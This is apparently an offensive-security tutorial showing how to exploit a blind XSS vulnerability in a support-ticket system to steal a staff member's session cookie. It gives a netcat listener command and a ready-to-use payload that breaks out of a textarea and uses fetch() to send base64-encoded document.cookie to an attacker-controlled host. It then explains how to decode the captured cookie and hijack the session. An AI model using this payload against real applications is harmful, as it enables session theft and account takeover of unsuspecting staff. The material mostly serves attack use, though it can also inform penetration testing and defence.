Let's say we want to exploit a blind XSS vulnerability we've found.
We have a Support Ticket system in which we can create tickets, and the ticket's content textarea field is vulnerable to XSS.
We know we're able to run JavaScript code, but because the injection is blind, the payload executes in someone else's browser and we never see the page it runs on, so we can't read anything back directly. We can, however, extend the payload so that it sends sensitive content to a server we control, and something as simple as a netcat listener is enough to receive it.
Because we're dealing with a Support Ticket system, it's reasonable to assume that a staff member will eventually view this ticket, which gives us a victim whose browser will execute our JavaScript.
Some helpful information to extract from another user would be their cookies, which we could use to elevate our privileges by hijacking their login session (provided the session cookie is not flagged HttpOnly, since document.cookie cannot read HttpOnly cookies).
To do this, our payload will need to read the user's cookies and exfiltrate them to a web server of our choice. Firstly, we'll need to set up a listening server to receive the information:
$ nc -nlvp 9001
Now that we've set up the method of receiving the exfiltrated information, we build the payload. The leading </textarea> closes the textarea element the ticket content is rendered in, so the script tag that follows is parsed as markup rather than as text:
</textarea><script>fetch('http://{URL_OR_IP:PORT}?cookie=' + btoa(document.cookie) );</script>
[!tip]
btoa() encodes the victim's cookies with base64 so the value survives intact in the query string. The base64 alphabet includes +, / and =; netcat shows the raw request, so nothing is lost, but if the receiving server URL-decodes the query, wrap the value in encodeURIComponent() as well.
Once a staff member opens the ticket, their browser sends the request to our listener, which prints the raw HTTP request line (GET /?cookie=... HTTP/1.1); netcat never answers, so the fetch() simply hangs on the victim's side, but the request has already arrived. We then base64-decode the cookie parameter to recover the session cookie.